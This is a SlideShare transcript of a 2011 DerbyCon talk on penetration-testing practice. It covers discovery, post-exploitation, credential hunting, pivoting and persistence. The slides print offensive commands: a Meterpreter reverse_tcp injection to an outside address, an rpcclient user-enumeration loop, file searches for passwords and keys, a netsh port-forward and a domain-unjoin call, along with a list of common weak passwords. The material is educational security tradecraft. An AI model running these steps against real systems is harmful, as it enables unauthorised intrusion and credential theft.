SlideShare a Scribd company logo
The Dirty Little Secrets
They Didn’t Teach You
  In Pentesting Class

                   DerbyCon 2011
meterpreter> getuid
• Chris Gates (CG)
   –   Twitter carnal0wnage
   –   Blog carnal0wnage.attackresearch.com
   –   Job Partner/Principal Security Consultant at Lares
   –   Affiliations  Attack Research, Metasploit
• Work

• Previous Talks
   –   Attack Oracle (via web)
   –   wXf Web eXploitation Framework
   –   Open Source Information Gathering
   –   Attacking Oracle (via TNS)
   –   Client-Side Attacks
meterpreter> getuid
• Rob Fuller (mubix)
  – Twitter -> mubix
  – Blog -> http://www.room362.com
  – Job -> Penetration Tester for Rapid7

• Previous Talks
  –   Networking for Penetration Testers
  –   Metasploit Framework/Pro Training for Rapid7
  –   Deep Magic 101
  –   Couch to Career in 80 hours
The setup…
• We do things
• You do things
• There’s a better way to do
  things*
• Because ‘they’ do them that way
• Or… now they will because you
  are some of ‘they’
• Use what you works for you
Domain Admin Or Bust
• Usually this means adding yourself as one
  – (aka fastest way to get caught)
• Really just about measuring…
Pentesting Goals
• What’s our goal?
• Vulnerability Driven vs. Data Driven vs. Capability
  Driven pentest/goal
• What’s a *good* goal?
   – Domain Admin is “A Goal” but it’s a stupid goal.
   – What makes the client money is a better goal (if you*
     can identify it)
   – Problems arise in actually identifying this. What’s
     important to testers vs client vs bad guys…
   – Best goal, testing client’s ability to detect & respond
     to various levels of attackers
Majority of ‘Pentesting’ going on
             today…



  Run
            Exploit      Report
Scanner
Majority of ‘Pentesting’ going on
                 today…
• Look I got 500+ shells!




• And?
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
Is it working?
• Who got 0wned?
Northrop Grumman:
http://www.foxnews.com/scitech/2011/05/31/northrop-grumman-hit-cyber-attack-source-says/

Lockheed Martin:
http://packetstormsecurity.org/news/view/19242/March-RSA-Hack-Hits-Lockheed-Remote-Systems-
Breached.html

L3:
http://threatpost.com/en_us/blogs/report-l3-warns-employees-attacks-using-compromised-securid-
    tokens-060111

Booz Allen Hamilton:
http://gizmodo.com/5820049/anonymous-leaks-90000-military-email-accounts-in-latest-antisec-attack

SAIC(older):
http://www.usatoday.com/news/nation/2007-07-20-saic-security_N.htm
Is it working?
• Who got 0wned? (recently)
DigiNotar:
http://www.rijksoverheid.nl/ministeries/bzk/documenten-en-
   publicaties/rapporten/2011/09/05/diginotar-public-report-version-1.html

Texas Police:
http://pastebin.com/LGyeLcun

Japan Mitsubishi Heavy Industries:
http://www.theregister.co.uk/2011/09/22/japan_military_hack_follow_up/

Everyone else (via RSA Employee #15666):
http://pastebin.com/yKSQd5Z5
http://hbgary.anonleaks.ch/greg_hbgary_com/26996.html
Is it working?




 Interaction Time!
A Better way?



                                         Vulnerability
Intelligence Gathering   Foot Printing                   Exploitation   Post Exploitation   Clean Up
                                           Analysis




http://www.secmaniac.com/files/BSides-StrategicPT-Final.pdf
Actual Attack Scenarios
                      Prepwork/
                       Analysis



   Post-                                  Intel
Exploitation                            Gathering




       Exploitation               Targeting
Actual Attack Scenarios (best case)
k, enough fiddle faddle…
• IT Security Industry is currently focused on minimizing the
  presence of vulnerabilities

• Consider a change in focus to what attacker
  tactics/techniques you can detect and respond to

• Let’s call this “Capability Driven Security Assessments”

• See my BruCon talk with Joe McCray

• To do this we need to ramp up post exploitation and stealth
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
PREPWORK
Prep Work
• Prep work, its awesome, show it some love…
  – Make your click scripts
  – Update your stuff
  – Have script and screen ready to go
How many of you have lost a shell
because _your_ connection died?
Screen
• No, not like drug screen…
• “Screen is a full-screen window manager that
  multiplexes a physical terminal between
  several processes, typically interactive shells.”
Screen Commands and Keyboard
               Shortcuts
•   screen –S mycustomer
•   CTRL-A then D (Detach)
•   screen –ls
•   screen –x –d mycustomer
    – attaches to ‘mycustomer’ screen
    – detaches other ‘attached’ sessions
• CTRL-A :multiuser on
    – (Does not work on Debian based)
How many of you have lost a data
because your scrollback wasn’t set
      to be long enough?
Script
• No, not like java script…
  – Logs all your stuff
  – Use it
     user@ubuntu:~$ script clientname.txt
     Script started, file is clientname.txt
     user@ubuntu:~$ exit
     exit
     Script done, file is clientname.txt
     user@ubuntu:~$
DISCOVERY
Discovery
Finding stuff to lay the smack down on
Quick Tangent Passwords
• Your passwords suck
Your passwords suck

• One of these passwords almost always works…

   password            passw0rd

   Password            $Company1

   Password123         $Company123

   welcome             changeme123

   welcome123          p@ssw0rd

   Username123         p@ssw0rd123


• OK back to it….
Nmap Scripts
• Obligatory nod to nmap scripts
• Best scripts don’t fire off automatically with “-A”
• Some of the cooler scripts…
  – Citrix, NFS, AFP, SNMP, LDAP awesome
  – Database coverage
  – http*
  – Lots of handy stuff, some overlap with MSF aux but
    some things aux doesn’t have.
• Go See Ron’s talk on Sunday
Nmap Scripts
• (removed citrix-enum-app-xml pic)
Passwords
• Your passwords suck
Nmap Scripts
• Oracle
• http://seclists.org/nmap-dev/2011/q3/546
Nmap Scripts
• Ldap
• http://seclists.org/nmap-dev/2011/q3/510
MSF Auxiliary Modules
• Metasploit Aux modules are awesome
• Handle all the BS for you
• Uses lib/rex ==“Ruby EXploitation library”
  –   Basic library for most tasks
  –   Sockets, protocols, command shell interface
  –   SSL, SMB, HTTP, XOR, Base64, random text
  –   Intended to be useful outside of the framework
• Lib/rex ported to a ruby gem!
  – Can make use of rex outside of MSF if so desired
MSF Auxiliary Modules
• Designed to help with reconnaissance
• Dozens of useful service scanners
• Simple module format, easy to use
• Specify THREADS for concurrency
   – Keep this under 16 for native Windows
   – 256 is fine on Linux
• Uses RHOSTS instead of RHOST
MSF Auxiliary Modules
• Uses OptAddressRange option class, similar to nmap
  host specification
   – 192.168.0.1,3,5-7
      • Standard ranges
   – 192.168.1-7.230
      • Same IP on multiple subnets
   – 192.168.0.*
      • 0-255
   – www.metasploit.com/24
      • 0-255 for whatever this resolves to
   – file:/tmp/ranges.txt
      • Line separated list of targets
MSF Auxiliary Modules
MSF Auxiliary Modules
MSF Auxiliary Modules
• Write your own to solve problems on the fly




• You should have been in egyp7’s training
EXPLOITATION
Exploitation
• We seem ok at this
  already…

• Considering it covered…

• Open my email…click
  that link…you know you
  want to…k thx bye
POST-EXPLOITATION
Post Exploitation Google Docs
• http://www.room362.com/blog/2011/9/6/po
  st-exploitation-command-lists.html
• Or http://bitly.com/qrbKQP

• Open Source (Anyone can edit them)
• Will always be public
  – (might have to lock down the edit privs based on
    defacement rate)
What is the best persistence method?
• Meterpreter?
  – HTTPS
  – Pro’s Persistence Agent
• MOS_DEF?
  – Thunderbird SPAM Persistence
  – DNS, HTTP, HTTPS, etc
• CORE Agent?
• Wiz-bang custom binary/backdoor?
• RAT (probably backdoored in other ways)
Nah… this is better
cat MyPasswords.txt
More on that later…
Hooking your homies up

• run multi_meter_inject -pt windows/meterpreter/reverse_tcp
  -mr 1.2.3.4 -p 80


• Multi-user functionality with armitage/msf pro
FINDING STUFF INTERNALLY
GOOD
•   Nmap
•   Ping
•   Nessus
•   Nexpose
•   Angry IP Scanner?
•   “net view /domain”
BETTER
• OSQL
• DSQUERY / DSGET (Annoying)
  – (Joeware) ADFind (less annoying)
• nltest
BETTER
• OSQL
  – osql –L
     • Lists all MS SQL servers
BETTER
• DSQUERY / DSGET (Annoying)
   –   dsquery computer -limit 0 current domain
   –   dsquery user -limit 0
   –   dsquery computer -limit 0 "DC=company,DC=net"
   –   dsquery user -limit 0 "DC=company,DC=net“  other domain
• Or use adfind (joeware)
BETTER
• nltest
  – Keeps trying to get you info if one path fails
What if CMD.exe is disabled?
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
But… dropping binaries == bad




          Damn you forensics people!
      (On exception binaries that blend in)
BEST
• Use the underlying API
• Railgun
• Demo
  – Route
  – ARPTable
  – TCPTable
Route
ARPTable
• No screenie 
TCPTable
BEST (Cont’d)
• Explain NetDiscovery
• Demo NetDiscovery
  – Highlight SQL, DC, UNIX, Novell selections


• Explain DomainDiscovery
• Demo DomainDiscovery
NetDiscovery


Demo pic
Quick Tangent
• Dig
  – mini NetDiscovery for
    just one hostname
DomainDiscovery

What domains do you
have access to?

Are they domains?

What are the names of
all their domain
controllers?
USER DISCOVERY
GOOD
•   net group “domain admins” /domain
•   net group “domain admins” /domain:DM
•   net localgroup Administrators
•   net group localgroup Administrators /domain
•   net user domainadmin_username /domain
•   net user username /domain
BETTER
• Rpcclient
  – Enumerate users
  #!/bin/bash
  for i in {500..600}
  do
     rpcclient -U “user%Password1" -W
  DOMAIN 1.2.3.4 -c "lookupsids S-1-
  5-21-1289870825-1602939633-
  2792175544-$i
  done
Passwords
• Your passwords suck
BEST
•   Explain UserDiscovery
•   Demo UserDiscovery
•   Explain DisplaySessions
•   Demo DisplaySessions
•   PVE-Find-AD-User
    – https://www.corelan.be/index.php/my-free-
      tools/ad-cs/pve-find-ad-user/
UserDiscovery
• Sorry no screenie 
DisplaySessions
Creating Zombies
• RunAs
  – ShellExecute,
    CreateProcessWith
    Logon, LogonUser
• WCE +
  runhash32/64
  – user level psexec
    == zombie user &
    token
DEMO
• Run
  executable
  in memory
Remember, you don’t HAVE to do this phase…

PRIVILEGE ESCALATION
GOOD
• getsystem
• Post modules
  – Keyboard layout
  – Bypassuac
• Core Impact / Canvas ship with locals
  – Honestly a big lacking area for MSF 
getsystem has options, use them
         or loose shells
BETTER?
• Explain DomainDrop

client.railgun.netapi32.NetUnjoinDomain(nil,nil,nil,nil)
BEST
• Just ask for it…
• Explain ‘Ask’ module

• Looking for the user that has the $stuff
• Tasklist
   – tasklist /V /S $IP /U $user /P $password

for /F "skip=3 delims= " %A in ('net view') do tasklist
/V /S %A /U $user /P $password
Just Ask
BEST
• Just ask for it…
• Explain ‘Ask’ module

• Looking for the user that has the $stuff
• Tasklist
   – tasklist /V /S $IP /U $user /P $password

for /F "skip=3 delims= " %A in ('net view') do tasklist
/V /S %A /U $user /P $password
Locating the data that actually matters…

FINDING THE HOPE
Searching for Gold (Good)
•   Dir /s “My Documents”
•   Dir /s “Desktop”
•   Dir /s *.pcf
•   ListDrives
Searching for Gold (Good)
Searching for files
     dir c:*password* /s
     dir c:*competitor* /s
     dir c:*finance* /s
     dir c:*risk* /s
     dir c:*assessment* /s
     dir c:*.key* /s
     dir c:*.vsd /s
     dir c:*.pcf /s
     dir c:*.ica /s
     dir c:*.crt /s
     dir c:*.log /s

Search in files
     findstr /I /N /S /P /C:password *
     findstr /I /N /S /P /C:secret *
     findstr /I /N /S /P /C:confidential *
     findstr /I /N /S /P /C:account *

Powershell/WMIC to do it
Searching for Gold (Better)
•   Dumplinks
•   GetFirefoxCreds
•   GetPidginCreds
•   Outlook, IE, Chrome, RDP
    Password Extraction
    – Basically the whole ‘credentials’
      post module section
• SharePoint
• Intranet.company.com

• Shouts to illwill, Kx499,
  thelightcosine
Searching for Gold (Best)
• OpenDLP
• Fiction’s Database Searcher
• Search in Meterpreter
  – Uses windows indexing i.e. outlook email
• Dir /s $share > filetosearchoffline.txt
  – Findstr too 
  – Do what works for you…click scripts rule
Kind dumb to stay on the initial point of entry…

PIVOTING
• Portforwarding
   –   Meterpreter portfwd
   –   Route
   –   Sock4a module + meterpreter session
   –   Pro VPN Pivot?
• Portproxy
   – Built into Windows
   – netsh interface portproxy>add v4tov4
     listenport=25 connectaddress=192.168.0.100
     connectport=80 protocol=tcp
• Legitimate Access via VPN, Term Server, Citrix, etc
One week isn’t showing impact of internal awareness…

PERSISTENCE
Microsoft has an app for that…

Autoruns
These won’t show up there…
• Smartlocker -> lockout_recorder
   – http://blog.metasploit.com/2010/12/capturing-windows-logons-
     with.html
• Fxsst.dll
   – https://blog.mandiant.com/archives/1786
   – http://www.room362.com/blog/2011/6/27/fxsstdll-persistence-the-
     evil-fax-machine.html
• Explain gpo_dropper hbgary
   – http://www.hbgary.com/malware-using-local-group-policy
• Explain IPv6 Dropper
   – http://hak5.org/hack/ipv6-from-the-pentesters-perspective
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
code on github soonish

https://github.com/mubix/Not-In-
         Pentesting-Class
Rob Fuller   Chris Gates


mubix        carnal0wnage

More Related Content

What's hot

Going Purple : From full time breaker to part time fixer: 1 year later
Going Purple : From full time breaker to part time fixer: 1 year later Going Purple : From full time breaker to part time fixer: 1 year later
Going Purple : From full time breaker to part time fixer: 1 year later
Chris Gates
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operations
Sunny Neo
 
A @textfiles approach to gathering the world's DNS
A @textfiles approach to gathering the world's DNSA @textfiles approach to gathering the world's DNS
A @textfiles approach to gathering the world's DNS
Rob Fuller
 
Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...
Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...
Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...
Chris Gates
 
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland
CODE BLUE
 
XXE: How to become a Jedi
XXE: How to become a JediXXE: How to become a Jedi
XXE: How to become a Jedi
Yaroslav Babin
 
Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016
Daniel Bohannon
 
Red Team Methodology - A Naked Look
Red Team Methodology - A Naked LookRed Team Methodology - A Naked Look
Red Team Methodology - A Naked Look
Jason Lang
 
Beyond Automated Testing - RVAsec 2016
Beyond Automated Testing - RVAsec 2016Beyond Automated Testing - RVAsec 2016
Beyond Automated Testing - RVAsec 2016
Andrew McNicol
 
SignaturesAreDead Long Live RESILIENT Signatures
SignaturesAreDead Long Live RESILIENT SignaturesSignaturesAreDead Long Live RESILIENT Signatures
SignaturesAreDead Long Live RESILIENT Signatures
Daniel Bohannon
 
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
CODE BLUE
 
BSides London 2017 - Hunt Or Be Hunted
BSides London 2017 - Hunt Or Be HuntedBSides London 2017 - Hunt Or Be Hunted
BSides London 2017 - Hunt Or Be Hunted
Alex Davies
 
Breadcrumbs to Loaves: BSides Austin '17
Breadcrumbs to Loaves: BSides Austin '17Breadcrumbs to Loaves: BSides Austin '17
Breadcrumbs to Loaves: BSides Austin '17
Brandon Arvanaghi
 
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015
CODE BLUE
 
BSides_Charm2015_Info sec hunters_gathers
BSides_Charm2015_Info sec hunters_gathersBSides_Charm2015_Info sec hunters_gathers
BSides_Charm2015_Info sec hunters_gathers
Andrew McNicol
 
Hunting for the secrets in a cloud forest
Hunting for the secrets in a cloud forestHunting for the secrets in a cloud forest
Hunting for the secrets in a cloud forest
SecuRing
 
Teensy Programming for Everyone
Teensy Programming for EveryoneTeensy Programming for Everyone
Teensy Programming for Everyone
Nikhil Mittal
 
BSidesOK_You_CAN_detect_PowerShell_attacks_v1.1
BSidesOK_You_CAN_detect_PowerShell_attacks_v1.1BSidesOK_You_CAN_detect_PowerShell_attacks_v1.1
BSidesOK_You_CAN_detect_PowerShell_attacks_v1.1
Michael Gough
 
BSides Philly Finding a Company's BreakPoint
BSides Philly Finding a Company's BreakPointBSides Philly Finding a Company's BreakPoint
BSides Philly Finding a Company's BreakPoint
Andrew McNicol
 
DevSec Defense
DevSec DefenseDevSec Defense
DevSec Defense
Daniel Bohannon
 

What's hot (20)

Going Purple : From full time breaker to part time fixer: 1 year later
Going Purple : From full time breaker to part time fixer: 1 year later Going Purple : From full time breaker to part time fixer: 1 year later
Going Purple : From full time breaker to part time fixer: 1 year later
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operations
 
A @textfiles approach to gathering the world's DNS
A @textfiles approach to gathering the world's DNSA @textfiles approach to gathering the world's DNS
A @textfiles approach to gathering the world's DNS
 
Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...
Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...
Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...
 
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland
 
XXE: How to become a Jedi
XXE: How to become a JediXXE: How to become a Jedi
XXE: How to become a Jedi
 
Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016
 
Red Team Methodology - A Naked Look
Red Team Methodology - A Naked LookRed Team Methodology - A Naked Look
Red Team Methodology - A Naked Look
 
Beyond Automated Testing - RVAsec 2016
Beyond Automated Testing - RVAsec 2016Beyond Automated Testing - RVAsec 2016
Beyond Automated Testing - RVAsec 2016
 
SignaturesAreDead Long Live RESILIENT Signatures
SignaturesAreDead Long Live RESILIENT SignaturesSignaturesAreDead Long Live RESILIENT Signatures
SignaturesAreDead Long Live RESILIENT Signatures
 
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
 
BSides London 2017 - Hunt Or Be Hunted
BSides London 2017 - Hunt Or Be HuntedBSides London 2017 - Hunt Or Be Hunted
BSides London 2017 - Hunt Or Be Hunted
 
Breadcrumbs to Loaves: BSides Austin '17
Breadcrumbs to Loaves: BSides Austin '17Breadcrumbs to Loaves: BSides Austin '17
Breadcrumbs to Loaves: BSides Austin '17
 
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015
 
BSides_Charm2015_Info sec hunters_gathers
BSides_Charm2015_Info sec hunters_gathersBSides_Charm2015_Info sec hunters_gathers
BSides_Charm2015_Info sec hunters_gathers
 
Hunting for the secrets in a cloud forest
Hunting for the secrets in a cloud forestHunting for the secrets in a cloud forest
Hunting for the secrets in a cloud forest
 
Teensy Programming for Everyone
Teensy Programming for EveryoneTeensy Programming for Everyone
Teensy Programming for Everyone
 
BSidesOK_You_CAN_detect_PowerShell_attacks_v1.1
BSidesOK_You_CAN_detect_PowerShell_attacks_v1.1BSidesOK_You_CAN_detect_PowerShell_attacks_v1.1
BSidesOK_You_CAN_detect_PowerShell_attacks_v1.1
 
BSides Philly Finding a Company's BreakPoint
BSides Philly Finding a Company's BreakPointBSides Philly Finding a Company's BreakPoint
BSides Philly Finding a Company's BreakPoint
 
DevSec Defense
DevSec DefenseDevSec Defense
DevSec Defense
 

Similar to The Dirty Little Secrets They Didn’t Teach You In Pentesting Class

The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting ClassThe Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
Rob Fuller
 
Metasploitation part-1 (murtuja)
Metasploitation part-1 (murtuja)Metasploitation part-1 (murtuja)
Metasploitation part-1 (murtuja)
ClubHack
 
PowerShell - Be A Cool Blue Kid
PowerShell - Be A Cool Blue KidPowerShell - Be A Cool Blue Kid
PowerShell - Be A Cool Blue Kid
Matthew Johnson
 
Why internal pen tests are still fun
Why internal pen tests are still funWhy internal pen tests are still fun
Why internal pen tests are still fun
pyschedelicsupernova
 
PAC 2019 virtual Christoph NEUMÜLLER
PAC 2019 virtual Christoph NEUMÜLLERPAC 2019 virtual Christoph NEUMÜLLER
PAC 2019 virtual Christoph NEUMÜLLER
Neotys
 
Vulnerability, exploit to metasploit
Vulnerability, exploit to metasploitVulnerability, exploit to metasploit
Vulnerability, exploit to metasploit
Tiago Henriques
 
01 Metasploit kung fu introduction
01 Metasploit kung fu introduction01 Metasploit kung fu introduction
01 Metasploit kung fu introduction
Mostafa Abdel-sallam
 
WTF is Penetration Testing v.2
WTF is Penetration Testing v.2WTF is Penetration Testing v.2
WTF is Penetration Testing v.2
Scott Sutherland
 
On non existent 0-days, stable binary exploits and
On non existent 0-days, stable binary exploits andOn non existent 0-days, stable binary exploits and
On non existent 0-days, stable binary exploits and
Alisa Esage Шевченко
 
DC612 Day - Hands on Penetration Testing 101
DC612 Day - Hands on Penetration Testing 101DC612 Day - Hands on Penetration Testing 101
DC612 Day - Hands on Penetration Testing 101
dc612
 
Esage on non-existent 0-days, stable binary exploits and user interaction
Esage   on non-existent 0-days, stable binary exploits and user interactionEsage   on non-existent 0-days, stable binary exploits and user interaction
Esage on non-existent 0-days, stable binary exploits and user interaction
DefconRussia
 
Open Source Cyber Weaponry
Open Source Cyber WeaponryOpen Source Cyber Weaponry
Open Source Cyber Weaponry
Joshua L. Davis
 
Hacker Halted 2014 - RDP Fuzzing And Why the Microsoft Open Protocol Specific...
Hacker Halted 2014 - RDP Fuzzing And Why the Microsoft Open Protocol Specific...Hacker Halted 2014 - RDP Fuzzing And Why the Microsoft Open Protocol Specific...
Hacker Halted 2014 - RDP Fuzzing And Why the Microsoft Open Protocol Specific...
EC-Council
 
John adams talk cloudy
John adams   talk cloudyJohn adams   talk cloudy
John adams talk cloudy
John Adams
 
You didnt see it’s coming? "Dawn of hardened Windows Kernel"
You didnt see it’s coming? "Dawn of hardened Windows Kernel" You didnt see it’s coming? "Dawn of hardened Windows Kernel"
You didnt see it’s coming? "Dawn of hardened Windows Kernel"
Peter Hlavaty
 
Nomura UCCSC 2009
Nomura UCCSC 2009Nomura UCCSC 2009
Nomura UCCSC 2009
dnomura
 
The basics of hacking and penetration testing 이제 시작이야 해킹과 침투 테스트 kenneth.s.kwon
The basics of hacking and penetration testing 이제 시작이야 해킹과 침투 테스트 kenneth.s.kwonThe basics of hacking and penetration testing 이제 시작이야 해킹과 침투 테스트 kenneth.s.kwon
The basics of hacking and penetration testing 이제 시작이야 해킹과 침투 테스트 kenneth.s.kwon
Kenneth Kwon
 
F8 tech talk_pinterest_v4
F8 tech talk_pinterest_v4F8 tech talk_pinterest_v4
F8 tech talk_pinterest_v4
malorie_pinterest
 
Hacklu2011 tricaud
Hacklu2011 tricaudHacklu2011 tricaud
Hacklu2011 tricaud
stricaud
 
Shmoocon 2015 - httpscreenshot
Shmoocon 2015 - httpscreenshotShmoocon 2015 - httpscreenshot
Shmoocon 2015 - httpscreenshot
jstnkndy
 

Similar to The Dirty Little Secrets They Didn’t Teach You In Pentesting Class (20)

The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting ClassThe Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
 
Metasploitation part-1 (murtuja)
Metasploitation part-1 (murtuja)Metasploitation part-1 (murtuja)
Metasploitation part-1 (murtuja)
 
PowerShell - Be A Cool Blue Kid
PowerShell - Be A Cool Blue KidPowerShell - Be A Cool Blue Kid
PowerShell - Be A Cool Blue Kid
 
Why internal pen tests are still fun
Why internal pen tests are still funWhy internal pen tests are still fun
Why internal pen tests are still fun
 
PAC 2019 virtual Christoph NEUMÜLLER
PAC 2019 virtual Christoph NEUMÜLLERPAC 2019 virtual Christoph NEUMÜLLER
PAC 2019 virtual Christoph NEUMÜLLER
 
Vulnerability, exploit to metasploit
Vulnerability, exploit to metasploitVulnerability, exploit to metasploit
Vulnerability, exploit to metasploit
 
01 Metasploit kung fu introduction
01 Metasploit kung fu introduction01 Metasploit kung fu introduction
01 Metasploit kung fu introduction
 
WTF is Penetration Testing v.2
WTF is Penetration Testing v.2WTF is Penetration Testing v.2
WTF is Penetration Testing v.2
 
On non existent 0-days, stable binary exploits and
On non existent 0-days, stable binary exploits andOn non existent 0-days, stable binary exploits and
On non existent 0-days, stable binary exploits and
 
DC612 Day - Hands on Penetration Testing 101
DC612 Day - Hands on Penetration Testing 101DC612 Day - Hands on Penetration Testing 101
DC612 Day - Hands on Penetration Testing 101
 
Esage on non-existent 0-days, stable binary exploits and user interaction
Esage   on non-existent 0-days, stable binary exploits and user interactionEsage   on non-existent 0-days, stable binary exploits and user interaction
Esage on non-existent 0-days, stable binary exploits and user interaction
 
Open Source Cyber Weaponry
Open Source Cyber WeaponryOpen Source Cyber Weaponry
Open Source Cyber Weaponry
 
Hacker Halted 2014 - RDP Fuzzing And Why the Microsoft Open Protocol Specific...
Hacker Halted 2014 - RDP Fuzzing And Why the Microsoft Open Protocol Specific...Hacker Halted 2014 - RDP Fuzzing And Why the Microsoft Open Protocol Specific...
Hacker Halted 2014 - RDP Fuzzing And Why the Microsoft Open Protocol Specific...
 
John adams talk cloudy
John adams   talk cloudyJohn adams   talk cloudy
John adams talk cloudy
 
You didnt see it’s coming? "Dawn of hardened Windows Kernel"
You didnt see it’s coming? "Dawn of hardened Windows Kernel" You didnt see it’s coming? "Dawn of hardened Windows Kernel"
You didnt see it’s coming? "Dawn of hardened Windows Kernel"
 
Nomura UCCSC 2009
Nomura UCCSC 2009Nomura UCCSC 2009
Nomura UCCSC 2009
 
The basics of hacking and penetration testing 이제 시작이야 해킹과 침투 테스트 kenneth.s.kwon
The basics of hacking and penetration testing 이제 시작이야 해킹과 침투 테스트 kenneth.s.kwonThe basics of hacking and penetration testing 이제 시작이야 해킹과 침투 테스트 kenneth.s.kwon
The basics of hacking and penetration testing 이제 시작이야 해킹과 침투 테스트 kenneth.s.kwon
 
F8 tech talk_pinterest_v4
F8 tech talk_pinterest_v4F8 tech talk_pinterest_v4
F8 tech talk_pinterest_v4
 
Hacklu2011 tricaud
Hacklu2011 tricaudHacklu2011 tricaud
Hacklu2011 tricaud
 
Shmoocon 2015 - httpscreenshot
Shmoocon 2015 - httpscreenshotShmoocon 2015 - httpscreenshot
Shmoocon 2015 - httpscreenshot
 

More from Chris Gates

Reiki 101 - Defcon29 MHHV
Reiki 101 - Defcon29 MHHVReiki 101 - Defcon29 MHHV
Reiki 101 - Defcon29 MHHV
Chris Gates
 
WeirdAAL (Awesome Attack Library) CactusCon 2018
WeirdAAL (Awesome Attack Library) CactusCon 2018WeirdAAL (Awesome Attack Library) CactusCon 2018
WeirdAAL (Awesome Attack Library) CactusCon 2018
Chris Gates
 
WeirdAAL (AWS Attack Library)
WeirdAAL (AWS Attack Library) WeirdAAL (AWS Attack Library)
WeirdAAL (AWS Attack Library)
Chris Gates
 
Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017
Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017
Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017
Chris Gates
 
Home Arcade setup (NoVA Hackers)
Home Arcade setup (NoVA Hackers)Home Arcade setup (NoVA Hackers)
Home Arcade setup (NoVA Hackers)
Chris Gates
 
DevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps ToolchainsDevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps Toolchains
Chris Gates
 
Open Canary - novahackers
Open Canary - novahackersOpen Canary - novahackers
Open Canary - novahackers
Chris Gates
 
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone  Sector...Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone  Sector...
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...
Chris Gates
 
DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016
DevOops Redux Ken Johnson Chris Gates  - AppSec USA 2016DevOops Redux Ken Johnson Chris Gates  - AppSec USA 2016
DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016
Chris Gates
 
DevOops & How I hacked you DevopsDays DC June 2015
DevOops & How I hacked you DevopsDays DC June 2015DevOops & How I hacked you DevopsDays DC June 2015
DevOops & How I hacked you DevopsDays DC June 2015
Chris Gates
 
Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015
Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015
Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015
Chris Gates
 
LasCon 2014 DevOoops
LasCon 2014 DevOoops LasCon 2014 DevOoops
LasCon 2014 DevOoops
Chris Gates
 
Appsec DC - wXf -2010
Appsec DC - wXf  -2010Appsec DC - wXf  -2010
Appsec DC - wXf -2010
Chris Gates
 
Windows attacks - AT is the new black
Windows attacks - AT is the new blackWindows attacks - AT is the new black
Windows attacks - AT is the new black
Chris Gates
 
